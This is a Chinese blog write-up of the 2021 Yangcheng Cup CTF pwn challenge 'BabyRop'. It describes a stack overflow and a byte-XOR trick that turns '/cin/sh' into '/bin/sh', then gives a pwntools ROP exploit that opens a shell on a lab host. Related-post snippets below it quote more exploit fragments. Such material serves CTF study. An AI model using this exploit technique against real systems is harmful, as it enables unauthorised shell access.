2021羊城杯 pwn BabyRop

最新推荐文章于 2024-09-06 16:15:01 发布

原创最新推荐文章于 2024-09-06 16:15:01 发布 · 319 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

CTF 专栏收录该内容

213 篇文章

订阅专栏

本文介绍了一种名为BabyRop的程序中的安全漏洞，并详细展示了如何通过编写payload利用此漏洞来实现对程序的控制。文章包括了远程连接目标主机、构造ROP链以及发送恶意数据的具体步骤。

在这里插入图片描述
显然没开啥保护

在这里插入图片描述
显然就是个溢出。

在这里插入图片描述显然是个后门函数

在这里插入图片描述
显然作用是能把一个字节与异或一个1

在这里插入图片描述显然有个字符/cin/sh

在这里插入图片描述
显然用函数2能把/cin/sh变成/bin/sh。

就一套rop带走就行。

exp

from pwn import*

r = remote("192.168.39.35", 11000)
elf = ELF("./BabyRop")
payload = 'a' * 44 + p32(0x80491fd) + p32(0x8049332) + p32(0x804c024) + p32(1) + p32(0x80491d6) * 2 + p32(0x804c024)
r.sendline(payload)
r.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

yongbaoii

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

2021羊城杯 pwn whats your name

yongbaoii的博客

09-24

448

libc是2.23的。保护是全开的。沙箱是有的。菜单。 set name edit name puts name delete name

2021羊城杯 pwn nologin

yongbaoii的博客

09-24

298

没开canary应该是能溢出没开NX就是写shellcode

参与评论您还未登录，请先登录后发表或查看评论

2021羊城杯pwn部分wp

eeeeeight的博客

09-12

6892

前言: 羊城杯的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*

2021 羊城杯 pwn how2heap

yongbaoii的博客

09-24

264

PIE NX RELRO都没开，然后题目说是2.23的libc。显然是菜单。 add 地址都在bss上面，然后申请到的chunk都是0x20的，前面十个字节实我们可以的输入，再八个字节是输入的大小。 get get函数就是一个输出。但是我们可以看到在第二个if的时候，result是int类型，所以可以有整数溢出。 del 显然也是一样的问题。但要注意的是free之后会覆盖上来再凑齐，中间不会留空挡。而且其实我们注意到这个地方是0x2e，但是前面可以序号一直到0x2f，那么我如果先释放0x.

暑假pwn训练(十三) pwn babyrop

doudoudedi

08-26

387

这道题我没时间去仔细的想 emem最后说是00截断长度判断的函数然后正常泄露libc基址getshell 先上exp晚上说说我调试的过程 #coding:utf-8 from pwn import * context.binary = './babyrop' io = remote('47.112.137.238',13337) # io = process('./babyrop') elf ...

羊城杯

doudoudedi

09-15

629

签到简单的uaf rom pwn import * context.terminal = ['tmux', 'splitw', '-h'] #p=process('./sg') p=remote('183.129.189.60',10029) elf=ELF('./sg') libc=elf.libc def add(size,name,mess): p.sendlineafter(': ','1') p.sendlineafter(':',str(size)) p.sendlineafter('

羊城杯2024 pwn4（kernel ＞= 5.6）

2301_79327647的博客

08-29

763

军训期间写题目实在是难崩，感觉能出的pwn4结果实在是没时间去搞（也有可能是我太菜了），赛后还被负责本次出题的学长贺师傅教育了一下，多练多练。个人感觉题目还行，虽然版本高一些，但是漏洞也很致命，只是magic_gradget不太好找了，没办法，好用的gadget是基于汇编上的，很容易就被修复，回顾我学的house系列，例如等中rdx都是编译级别的利用方式，可以很容易被修复，或者编译器发生变化也可能不再能使用。高版本的glibc真的难啊。

羊城杯比赛pwn复现

最新发布

yufeiyu66的博客

09-06

695

pwn 比赛复现

羊城杯2023 pwn-arrary_index_bank

sagic的博客

07-19

483

存在整数溢出，不可以直接改地址，因为super_ai的返回地址一定比v1高所为不行。会等于0x38呢，因为7*8产生了进位所以4被64位舍弃。程序中含有system函数初步判定可能为ret2text。地址因为是十进制所以进行转换查看是否泄漏成功。地址已经泄漏完成开始payload的搭建。cmp操作进行完比较相同为0不相同为1。接收地址-super_ai的返回地址。考虑堆栈平衡 + 0x1315。发现RAX已经变成负数。泄漏地址为rbp下一位。如何进行整数溢出呢？

BUUCTF--pwn--[OGeek2019]babyrop【ret2libc】

qq_73149934的博客

12-06

336

BUUCTF--pwn--[OGeek2019]babyrop

rOpbaby-CTFPWN ROP练习题

08-21

DefConCTF 2015 Quals CTFPWN ROP练习题可用于练习基础的ROP

2020YCBCTF:2020羊城杯官方writeup及

03-24

2020年 2020羊城杯官方writeup及源码各个过渡的分散的writeup后续会逐步上传，所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了！

2021羊城杯CTF wp

abelxu

09-13

3232

1.签到比较坑的点是《一起来看***》是17，猜了很久才猜出来 28-08-30-07-04-20-02-17-23-01-12-19 得到flag SangFor{d93b7da38d89c19f481e710ef1b3558b} 2.BabyRop 一万年没做pwn了，为了骗点分还是看了一下。 fgets存在栈溢出没有cannary保护存在system函数（也可以用func1）,存在/cin/sh字符串所以可以直接getshell。坑点是不能使用/cin/sh和/sh要执行system(“sh

[羊城杯 2020]Bytecode [UTCTF2020]babymips

寻梦&之璐

05-30

1298

文章目录查看题目python代码Z3约束脚本查看题目 python字节码，需要把它转为python代码，如下： python代码 import dis def main(): en=[3,37,72,9,6,132] output=[101,96,23,68,112,42,107,62,96,53,176,179,98,53,67,29,41,120,60,106,51,101,178,189,101,48] print("welcome to GWHT2020") f

日行一PWN babyrop 动态链接库的使用

m0_57221101的博客

05-17

495

我们在之前的机器中，通常就是利用一段程序中代码段下已有的指令来实现我们得到flag或者拿下shell的目的。但是抛出了一个问题，如果程序中没有危险语句，就无从下手。所以，此次我们引出了一个概念，动态链接库libc。这也解决了我一直以来的问题，为什么call的函数点进去只能看到return，因为声明的函数并不在代码的cs段内，而是应用了随机化存储，存在内存的其他地方了。之后通过某些方法调用，这个某些方法这事以后的事情了。闲话少叙，我们开始今天的日行一pwn。开始例行检查，开启了

羊城杯_2020_babyre 题解

lifanxin的博客

09-09

1453

babyre题目信息考查知识题目分析WP脚本总结题目信息本题目来自于2020年羊城杯的逆向题，可以在buuoj上找到题目复现。考查知识本题目考查的知识点有：DES/AES算法，SMC自修改代码，以及合理利用动态调试来快速解题。关于动态调试，这里很多人可能会遇到环境问题，主要是因为题目调用了openssl的动态加密算法库，所以本地也得有一个。同时还需要注意openssl加密算法库的版本问题，该题目必须使用libcrypto.so.1.0.0。这里我给出该算法库文件 – libcrypto

【2023羊城杯CTF初赛】程序猿Quby wp

Makabakahaha的博客

09-04

931

羊城杯小记

2024年“羊城杯”粤港澳大湾区网络安全大赛 MISC部分

Geek极安云科-致力于网络安全事业

08-29

1018

中途遇到一个坑，换了两个解密软件都不行，都说AES秘钥需要128字节，浪费了半小时，由于前一天hvv通宵了，至此已经30个小时没有休息了，坐着睡着了两分钟，醒来马上开窍（垂死梦中惊坐起），换上我最常用的在线解密网站，KYE=DASCTF，直接解出flag。winhex打开发现底部有提示，FTK打开该复现发现需要密码，1324567不对，试了下按shift输入!据题意，该文件为音频隐写，binwalk显示存在mysql索引文件，但是一直分离不出，其实是误报，被误导了好久浪费了很长时间。

2022羊城杯密码wp

mxx307的博客

09-04

1410

2022羊城杯密码wp

2023 羊城杯 pwn

01-02

2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一，羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术，包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...